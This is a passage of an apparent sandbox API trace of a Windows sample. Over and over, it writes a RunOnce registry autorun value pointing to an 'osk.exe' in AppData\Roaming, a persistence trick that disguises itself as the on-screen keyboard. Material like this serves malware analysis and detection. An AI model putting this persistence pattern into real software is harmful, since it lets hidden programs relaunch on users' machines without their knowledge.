Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.843] RegCloseKey (hKey=0x280) returned 0x0 [0082.843] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.843] SetTimer (hWnd=0x20280, nIDEvent=0x210a, uElapse=0xa, lpTimerFunc=0x0) returned 0x210a [0082.843] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.857] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.857] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.858] KillTimer (hWnd=0x20280, uIDEvent=0x210a) returned 1 [0082.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.858] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.858] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.858] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.859] RegCloseKey (hKey=0x280) returned 0x0 [0082.859] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.859] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.859] SetTimer (hWnd=0x20280, nIDEvent=0x210b, uElapse=0xa, lpTimerFunc=0x0) returned 0x210b [0082.859] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.873] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.873] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.873] KillTimer (hWnd=0x20280, uIDEvent=0x210b) returned 1 [0082.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.873] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.874] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.874] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.874] RegCloseKey (hKey=0x280) returned 0x0 [0082.874] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.874] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.874] SetTimer (hWnd=0x20280, nIDEvent=0x210c, uElapse=0xa, lpTimerFunc=0x0) returned 0x210c [0082.874] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.888] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.888] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.888] KillTimer (hWnd=0x20280, uIDEvent=0x210c) returned 1 [0082.889] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.889] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.889] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.889] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.890] RegCloseKey (hKey=0x280) returned 0x0 [0082.890] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.890] SetTimer (hWnd=0x20280, nIDEvent=0x210d, uElapse=0xa, lpTimerFunc=0x0) returned 0x210d [0082.890] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.904] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.904] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.905] KillTimer (hWnd=0x20280, uIDEvent=0x210d) returned 1 [0082.905] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.905] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.905] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.906] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.906] RegCloseKey (hKey=0x280) returned 0x0 [0082.906] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.906] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.906] SetTimer (hWnd=0x20280, nIDEvent=0x210e, uElapse=0xa, lpTimerFunc=0x0) returned 0x210e [0082.906] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.920] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.920] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.920] KillTimer (hWnd=0x20280, uIDEvent=0x210e) returned 1 [0082.920] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.920] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.921] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.921] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.921] RegCloseKey (hKey=0x280) returned 0x0 [0082.921] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.921] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.921] SetTimer (hWnd=0x20280, nIDEvent=0x210f, uElapse=0xa, lpTimerFunc=0x0) returned 0x210f [0082.921] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.935] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.935] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.935] KillTimer (hWnd=0x20280, uIDEvent=0x210f) returned 1 [0082.936] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.936] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.936] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.936] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.936] RegCloseKey (hKey=0x280) returned 0x0 [0082.936] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.937] SetTimer (hWnd=0x20280, nIDEvent=0x2110, uElapse=0xa, lpTimerFunc=0x0) returned 0x2110 [0082.937] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.951] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.951] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.951] KillTimer (hWnd=0x20280, uIDEvent=0x2110) returned 1 [0082.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.952] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.952] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.952] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.952] RegCloseKey (hKey=0x280) returned 0x0 [0082.952] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.952] SetTimer (hWnd=0x20280, nIDEvent=0x2111, uElapse=0xa, lpTimerFunc=0x0) returned 0x2111 [0082.952] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.966] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.966] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.966] KillTimer (hWnd=0x20280, uIDEvent=0x2111) returned 1 [0082.967] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.967] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.967] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.967] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.968] RegCloseKey (hKey=0x280) returned 0x0 [0082.968] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.968] SetTimer (hWnd=0x20280, nIDEvent=0x2112, uElapse=0xa, lpTimerFunc=0x0) returned 0x2112 [0082.968] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.982] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.982] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.982] KillTimer (hWnd=0x20280, uIDEvent=0x2112) returned 1 [0082.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.983] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.983] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.983] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.983] RegCloseKey (hKey=0x280) returned 0x0 [0082.983] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.983] SetTimer (hWnd=0x20280, nIDEvent=0x2113, uElapse=0xa, lpTimerFunc=0x0) returned 0x2113 [0082.984] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.997] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.997] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.998] KillTimer (hWnd=0x20280, uIDEvent=0x2113) returned 1 [0082.998] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.998] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.998] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.998] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.999] RegCloseKey (hKey=0x280) returned 0x0 [0082.999] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.999] SetTimer (hWnd=0x20280, nIDEvent=0x2114, uElapse=0xa, lpTimerFunc=0x0) returned 0x2114 [0082.999] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.014] KillTimer (hWnd=0x20280, uIDEvent=0x2114) returned 1 [0083.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.015] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.015] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.015] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.015] RegCloseKey (hKey=0x280) returned 0x0 [0083.015] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.015] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.015] SetTimer (hWnd=0x20280, nIDEvent=0x2115, uElapse=0xa, lpTimerFunc=0x0) returned 0x2115 [0083.015] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.029] KillTimer (hWnd=0x20280, uIDEvent=0x2115) returned 1 [0083.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.030] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.030] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.030] RegCloseKey (hKey=0x280) returned 0x0 [0083.030] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.030] SetTimer (hWnd=0x20280, nIDEvent=0x2116, uElapse=0xa, lpTimerFunc=0x0) returned 0x2116 [0083.030] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.044] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.044] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.044] KillTimer (hWnd=0x20280, uIDEvent=0x2116) returned 1 [0083.045] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.045] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.045] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.045] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.046] RegCloseKey (hKey=0x280) returned 0x0 [0083.046] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.046] SetTimer (hWnd=0x20280, nIDEvent=0x2117, uElapse=0xa, lpTimerFunc=0x0) returned 0x2117 [0083.046] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.061] KillTimer (hWnd=0x20280, uIDEvent=0x2117) returned 1 [0083.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.062] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.062] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.062] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.062] RegCloseKey (hKey=0x280) returned 0x0 [0083.063] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.063] SetTimer (hWnd=0x20280, nIDEvent=0x2118, uElapse=0xa, lpTimerFunc=0x0) returned 0x2118 [0083.063] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.075] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.075] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.076] KillTimer (hWnd=0x20280, uIDEvent=0x2118) returned 1 [0083.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.076] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.076] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.077] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.077] RegCloseKey (hKey=0x280) returned 0x0 [0083.077] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.077] SetTimer (hWnd=0x20280, nIDEvent=0x2119, uElapse=0xa, lpTimerFunc=0x0) returned 0x2119 [0083.077] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.091] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.091] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.091] KillTimer (hWnd=0x20280, uIDEvent=0x2119) returned 1 [0083.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.092] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.092] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.092] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.092] RegCloseKey (hKey=0x280) returned 0x0 [0083.093] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.093] SetTimer (hWnd=0x20280, nIDEvent=0x211a, uElapse=0xa, lpTimerFunc=0x0) returned 0x211a [0083.093] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.107] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.107] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.107] KillTimer (hWnd=0x20280, uIDEvent=0x211a) returned 1 [0083.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.108] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.108] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.108] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.108] RegCloseKey (hKey=0x280) returned 0x0 [0083.108] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.108] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.108] SetTimer (hWnd=0x20280, nIDEvent=0x211b, uElapse=0xa, lpTimerFunc=0x0) returned 0x211b [0083.109] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.123] KillTimer (hWnd=0x20280, uIDEvent=0x211b) returned 1 [0083.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.124] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.124] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.124] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.124] RegCloseKey (hKey=0x280) returned 0x0 [0083.125] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.125] SetTimer (hWnd=0x20280, nIDEvent=0x211c, uElapse=0xa, lpTimerFunc=0x0) returned 0x211c [0083.125] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.144] KillTimer 